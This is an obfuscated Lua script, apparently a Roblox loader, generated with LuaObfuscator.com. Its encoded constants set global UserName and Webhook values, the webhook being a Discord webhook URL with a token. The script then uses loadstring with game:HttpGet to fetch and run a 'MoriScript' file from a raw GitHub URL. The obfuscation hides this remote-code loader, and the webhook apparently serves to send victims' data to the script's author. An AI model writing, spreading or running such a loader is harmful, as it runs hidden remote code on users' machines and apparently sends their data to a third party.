--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/(((1642 -(1523 + 114)) -3)^(v32-(2 -(1 + 0)))))%((3 -(1 -0))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + 201))) ;else local v84=(929 -(214 + 713))^(v32-((1066 -(68 + 997)) + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==1) then return v35;end if (v34==((0 + 0) -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=118 -(32 + 85) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (30800116 -14022900)) + (v41 * 65536) + (v40 * ((446 + 160) -(87 + 263))) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v38=2 -1 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,3 -(8 -6) ,972 -(802 + 150) ) * ((5 -3)^(100 -(40 + 28)))) + v43 ;local v47=v20(v44,37 -16 ,49 -(10 + (29 -21)) );local v48=((v20(v44,24 + (28 -20) )==((1857 -(814 + 45)) -(915 + 82))) and  -(443 -(416 + 26))) or (2 -1) ;if (v47==(0 + 0)) then if (v46==(0 -0)) then return v48 * ((0 -0) + 0) ;else v47=431 -(44 + 386) ;v45=1486 -(998 + 488) ;end elseif (v47==(2691 -644)) then return ((v46==0) and (v48 * ((1188 -(1069 + 118))/((0 + 0) -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2237 -(429 + 785)) ) * (v45 + (v46/((1 + 1)^(92 -40)))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(886 -(261 + 624)) );v18=v18 + v49 ;local v51={};for v66=1 -0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=(1838 -(274 + 1561))) then else v59=nil;while true do local v89=0;while true do if (v89==(0 -0)) then if (v53==0) then local v94=0 + 0 ;local v95;while true do if (v94~=(241 -(187 + 54))) then else v95=780 -(162 + 618) ;while true do if (2==v95) then v53=1;break;end if (v95==(0 + 0)) then v54={};v55={};v95=1;end if (v95==(1 + 0)) then v56={};v57={v54,v55,nil,v56};v95=2;end end break;end end end if (v53~=2) then else for v97=1,v23() do local v98=0 + 0 ;local v99;local v100;while true do if (v98==(1637 -(1373 + 263))) then while true do if (v99~=0) then else v100=v21();if (v20(v100,1001 -(451 + 549) ,1)==0) then local v157=0 + 0 ;local v158;local v159;local v160;local v161;while true do if (v157==0) then local v166=0 -0 ;while true do if (v166~=(1 -0)) then else v157=1385 -(746 + 638) ;break;end if (v166==(0 + 0)) then local v169=0 -0 ;while true do if (v169~=(341 -(218 + 123))) then else v158=0;v159=nil;v169=1;end if (v169~=1) then else v166=1;break;end end end end end if (1==v157) then local v167=1581 -(1535 + 46) ;while true do if (v167==(1 + 0)) then v157=2;break;end if (v167==(0 + 0)) then v160=nil;v161=nil;v167=1;end end end if (v157==2) then while true do if (2==v158) then local v170=560 -(306 + 254) ;while true do if (v170~=(0 + 0)) then else local v179=0 -0 ;while true do if (v179==0) then local v181=1467 -(899 + 568) ;while true do if (v181==0) then if (v20(v160,1,1)~=1) then else v161[2]=v59[v161[2]];end if (v20(v160,2,2 + 0 )~=(2 -1)) then else v161[3]=v59[v161[3]];end v181=604 -(268 + 335) ;end if (v181==1) then v179=291 -(60 + 230) ;break;end end end if (v179==1) then v170=573 -(426 + 146) ;break;end end end if (v170==(1 + 0)) then v158=3;break;end end end if (v158~=3) then else if (v20(v160,1459 -(282 + 1174) ,814 -(569 + 242) )==(2 -1)) then v161[1 + 3 ]=v59[v161[1028 -(706 + 318) ]];end v54[v97]=v161;break;end if (v158~=(1251 -(721 + 530))) then else local v172=1271 -(945 + 326) ;local v173;local v174;while true do if (v172==(0 -0)) then v173=0;v174=nil;v172=1;end if (v172==(1 + 0)) then while true do if (v173~=(700 -(271 + 429))) then else v174=0 + 0 ;while true do if ((1500 -(1408 + 92))==v174) then local v183=0;local v184;while true do if (v183~=0) then else v184=1086 -(461 + 625) ;while true do if (v184~=1) then else v174=1;break;end if (v184~=(1288 -(993 + 295))) then else v159=v20(v100,2,1 + 2 );v160=v20(v100,4,6);v184=1172 -(418 + 753) ;end end break;end end end if (1~=v174) then else v158=1 + 0 ;break;end end break;end end break;end end end if (v158==1) then local v175=0 + 0 ;local v176;while true do if (v175~=0) then else v176=0 + 0 ;while true do if (v176==1) then v158=2;break;end if (v176==(0 + 0)) then local v182=0;while true do if (v182==(530 -(406 + 123))) then v176=1770 -(1749 + 20) ;break;end if (v182~=0) then else v161={v22(),v22(),nil,nil};if (v159==(0 -0)) then local v189=0 -0 ;while true do if (v189==(1900 -(106 + 1794))) then v161[3]=v22();v161[4]=v22();break;end end elseif (v159==1) then v161[3]=v23();elseif (v159==2) then v161[3]=v23() -((1 + 1)^(5 + 11)) ;elseif (v159==(8 -5)) then local v194=0 -0 ;local v195;local v196;local v197;while true do if (v194==(115 -(4 + 110))) then v197=nil;while true do if (v195==(585 -(57 + 527))) then while true do if (v196~=0) then else v197=1427 -(41 + 1386) ;while true do if (v197~=(103 -(17 + 86))) then else v161[3]=v23() -(2^16) ;v161[4]=v22();break;end end break;end end break;end if (v195==(0 + 0)) then local v198=0;while true do if (v198==(1 -0)) then v195=1;break;end if (v198~=0) then else v196=0 -0 ;v197=nil;v198=167 -(122 + 44) ;end end end end break;end if (0==v194) then v195=0 -0 ;v196=nil;v194=3 -2 ;end end end v182=1 + 0 ;end end end end break;end end end end break;end end end break;end end break;end if (v98~=(0 + 0)) then else v99=0 -0 ;v100=nil;v98=66 -(30 + 35) ;end end end for v101=1 + 0 ,v23() do v55[v101-1 ]=v28();end return v57;end v89=1;end if (v89~=(1258 -(1043 + 214))) then else if (v53~=(3 -2)) then else v58=v23();v59={};for v103=1,v58 do local v104=0;local v105;local v106;local v107;local v108;while true do if (v104==(1212 -(323 + 889))) then v105=0 -0 ;v106=nil;v104=1;end if (v104==1) then v107=nil;v108=nil;v104=582 -(361 + 219) ;end if (v104~=(322 -(53 + 267))) then else while true do if (v105~=(1 + 0)) then else v108=nil;while true do if (v106~=(414 -(15 + 398))) then else if (v107==1) then v108=v21()~=0 ;elseif (v107==2) then v108=v24();elseif (v107~=(985 -(18 + 964))) then else v108=v25();end v59[v103]=v108;break;end if (v106==0) then local v163=0 -0 ;local v164;local v165;while true do if (v163~=1) then else while true do if (v164==(0 + 0)) then v165=0 + 0 ;while true do if (v165==(850 -(20 + 830))) then local v180=0 + 0 ;while true do if (v180~=(127 -(116 + 10))) then else v165=1;break;end if ((0 + 0)==v180) then v107=v21();v108=nil;v180=1;end end end if (v165~=1) then else v106=739 -(542 + 196) ;break;end end break;end end break;end if ((0 -0)==v163) then v164=0;v165=nil;v163=1;end end end end break;end if (v105~=0) then else local v155=0 + 0 ;local v156;while true do if (0==v155) then v156=0;while true do if (v156~=1) then else v105=1 + 0 ;break;end if (v156==(0 + 0)) then local v168=0 -0 ;while true do if (0==v168) then v106=0;v107=nil;v168=1;end if (1~=v168) then else v156=2 -1 ;break;end end end end break;end end end end break;end end end v57[1554 -(1126 + 425) ]=v21();v53=2;end break;end end end break;end if (2~=v52) then else v57=nil;v58=nil;v52=3;end if (1~=v52) then else v55=nil;v56=nil;v52=407 -(118 + 287) ;end if (v52==0) then v53=0 -0 ;v54=nil;v52=1122 -(118 + 1003) ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81>0) then local v109=0;local v110;while true do if (0==v109) then v110=v80[2];v78[v110]=v78[v110](v13(v78,v110 + 1 ,v73));break;end end else local v111=v80[2];local v112=v78[v80[3]];v78[v111 + 1 ]=v112;v78[v111]=v112[v80[4]];end elseif (v81>2) then v78[v80[2]]=v62[v80[3]];else local v118=v80[2];local v119=v78[v80[3]];v78[v118 + 1 ]=v119;v78[v118]=v119[v80[4]];end elseif (v81<=5) then if (v81==4) then v78[v80[2]]=v80[3];else local v125=v80[2];local v126,v127=v71(v78[v125](v13(v78,v125 + 1 ,v80[3])));v73=(v127 + v125) -1 ;local v128=0;for v143=v125,v73 do local v144=0;while true do if (v144==0) then v128=v128 + 1 ;v78[v143]=v126[v128];break;end end end end elseif (v81<=6) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==7) then v78[v80[2]]();else v78[v80[2]]=v62[v80[3]];end elseif (v81<=12) then if (v81<=10) then if (v81==9) then v78[v80[2]]=v80[3];else local v132=v80[2];local v133,v134=v71(v78[v132](v13(v78,v132 + 1 ,v80[3])));v73=(v134 + v132) -1 ;local v135=0;for v145=v132,v73 do local v146=0;while true do if (v146==0) then v135=v135 + 1 ;v78[v145]=v133[v135];break;end end end end elseif (v81>11) then do return;end else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=14) then if (v81==13) then v78[v80[2]]=v80[3]~=0 ;else local v139=v80[2];v78[v139]=v78[v139](v13(v78,v139 + 1 ,v73));end elseif (v81<=15) then v78[v80[2]][v80[3]]=v80[4];elseif (v81>16) then v78[v80[2]]();else do return;end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003023O005F4703083O00557365724E616D65030E3O004161726F6E4A61636F625F312O3303093O00557365724E616D653203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O393238303238342O3935382O333936372F4B4E6B4D733352566B6F52546C526A342O77556E6B4570555137736D5A3531554145385438453946525578346872317A64742D646735592D32747752624A43316F5F466B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A000F3O0012033O00013O00300B3O000200030012033O00013O00300B3O000400030012033O00013O00300B3O000500060012033O00073O001203000100083O0020020001000100090012040003000A4O0006000400014O000A000100044O000E5O00022O00073O000100012O000C3O00017O00",v9(),...);end
